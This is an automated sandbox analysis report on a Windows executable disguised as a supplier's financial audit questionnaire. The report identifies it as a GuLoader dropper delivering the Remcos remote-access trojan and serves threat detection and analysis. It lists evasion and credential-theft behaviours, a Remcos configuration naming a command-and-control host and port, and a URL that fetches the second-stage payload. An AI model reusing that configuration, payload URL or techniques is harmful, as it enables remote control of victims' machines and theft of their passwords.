Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe

Overview

General Information

Sample name:Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
Analysis ID:1576235
MD5:e1dc71be5b3466d47a4934013be9b604
SHA1:4c6627a901ade3b1f0cd6a233085deb7e044ef97
SHA256:1352efe35374bcc94f0b4e189761610a8620ff63aad350060a806773c969fd53
Tags:exeRATRemcosRATuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Installs a global keyboard hook
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected WebBrowserPassView password recovery tool
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["162.251.122.87:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-UOMZ21", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000009.00000002.3427771345.00000000025CF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000009.00000002.3426501953.000000000019F000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000009.00000002.3427771345.00000000025B3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000000.00000002.2466748409.0000000004BEF000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Process Memory Space: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe PID: 7332JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
              Click to see the 3 entries

              Stealing of Sensitive Information

              barindex
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, ProcessId: 2936, TargetFilename: C:\ProgramData\remcos\logs.dat
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-16T17:05:02.498304+010020365941Malware Command and Control Activity Detected192.168.2.649816162.251.122.872404TCP
              2024-12-16T17:05:04.748395+010020365941Malware Command and Control Activity Detected192.168.2.649822162.251.122.872404TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-16T17:05:04.952583+010028033043Unknown Traffic192.168.2.649824178.237.33.5080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-16T17:04:58.519187+010028032702Potentially Bad Traffic192.168.2.64980866.63.187.3080TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000009.00000002.3427771345.00000000025B3000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["162.251.122.87:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-UOMZ21", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeReversingLabs: Detection: 18%
              Source: Yara matchFile source: 00000009.00000002.3427771345.00000000025CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3426501953.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3427771345.00000000025B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe PID: 2936, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,12_2_00404423
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 0_2_00405814 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405814
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 0_2_004062CF FindFirstFileW,FindClose,0_2_004062CF
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 9_2_00402770 FindFirstFileW,9_2_00402770
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 9_2_00405814 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_00405814
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 9_2_004062CF FindFirstFileW,FindClose,9_2_004062CF
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 9_2_335610F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_335610F1
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 9_2_33566580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,9_2_33566580
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_0040AE51 FindFirstFileW,FindNextFileW,12_2_0040AE51
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407EF8
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407898

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49816 -> 162.251.122.87:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49822 -> 162.251.122.87:2404
              Source: Malware configuration extractorIPs: 162.251.122.87
              Source: global trafficTCP traffic: 192.168.2.6:49816 -> 162.251.122.87:2404
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: UNREAL-SERVERSUS UNREAL-SERVERSUS
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49808 -> 66.63.187.30:80
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49824 -> 178.237.33.50:80
              Source: global trafficHTTP traffic detected: GET /GrDfwEbxHEuyrsJcDgnTLZ14.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 66.63.187.30Cache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: global trafficHTTP traffic detected: GET /GrDfwEbxHEuyrsJcDgnTLZ14.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 66.63.187.30Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3448861708.0000000033530000.00000040.10000000.00040000.00000000.sdmp, Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000E.00000002.2672411821.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000E.00000002.2672411821.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000C.00000002.2691314548.0000000000A08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000C.00000002.2691314548.0000000000A08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3448701900.0000000033440000.00000040.10000000.00040000.00000000.sdmp, Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3448701900.0000000033440000.00000040.10000000.00040000.00000000.sdmp, Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3428265601.0000000004250000.00000004.00001000.00020000.00000000.sdmp, Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3427771345.00000000025B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.30/GrDfwEbxHEuyrsJcDgnTLZ14.bin
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3427771345.00000000025B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.30/GrDfwEbxHEuyrsJcDgnTLZ14.binS
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3427771345.0000000002578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.30/GrDfwEbxHEuyrsJcDgnTLZ14.binq
              Source: bhv8781.tmp.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: bhv8781.tmp.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: bhv8781.tmp.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhv8781.tmp.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
              Source: bhv8781.tmp.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
              Source: bhv8781.tmp.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
              Source: bhv8781.tmp.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
              Source: bhv8781.tmp.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
              Source: bhv8781.tmp.12.drString found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
              Source: bhv8781.tmp.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: bhv8781.tmp.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: bhv8781.tmp.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv8781.tmp.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhv8781.tmp.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
              Source: bhv8781.tmp.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
              Source: bhv8781.tmp.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhv8781.tmp.12.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
              Source: bhv8781.tmp.12.drString found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
              Source: bhv8781.tmp.12.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
              Source: bhv8781.tmp.12.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
              Source: bhv8781.tmp.12.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: bhv8781.tmp.12.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv8781.tmp.12.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
              Source: bhv8781.tmp.12.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhv8781.tmp.12.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
              Source: bhv8781.tmp.12.drString found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3427771345.00000000025CF000.00000004.00000020.00020000.00000000.sdmp, Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3427771345.0000000002578000.00000004.00000020.00020000.00000000.sdmp, Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3427771345.00000000025B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3427771345.00000000025CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp-
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3427771345.00000000025B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpM
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3427771345.00000000025B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpZ
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3427771345.00000000025B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpal
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3427771345.00000000025B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gplV
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: bhv8781.tmp.12.drString found in binary or memory: http://ocsp.digicert.com0
              Source: bhv8781.tmp.12.drString found in binary or memory: http://ocsp.digicert.com0:
              Source: bhv8781.tmp.12.drString found in binary or memory: http://ocsp.digicert.com0H
              Source: bhv8781.tmp.12.drString found in binary or memory: http://ocsp.digicert.com0I
              Source: bhv8781.tmp.12.drString found in binary or memory: http://ocsp.digicert.com0Q
              Source: bhv8781.tmp.12.drString found in binary or memory: http://ocsp.msocsp.com0
              Source: bhv8781.tmp.12.drString found in binary or memory: http://ocsp.msocsp.com0S
              Source: bhv8781.tmp.12.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: bhv8781.tmp.12.drString found in binary or memory: http://www.digicert.com/CPS0~
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000E.00000002.2672411821.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000E.00000003.2671982140.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000E.00000003.2672022326.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000E.00000002.2672411821.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3448861708.0000000033530000.00000040.10000000.00040000.00000000.sdmp, Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000E.00000002.2672411821.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000E.00000003.2671982140.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000E.00000003.2672022326.0000000000A0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.compData
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3448861708.0000000033530000.00000040.10000000.00040000.00000000.sdmp, Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000E.00000002.2672411821.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000C.00000002.2690904376.0000000000193000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000E.00000002.2672411821.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeString found in binary or memory: http://www.skinstudio.netG
              Source: bhv8781.tmp.12.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL
              Source: bhv8781.tmp.12.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
              Source: bhv8781.tmp.12.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
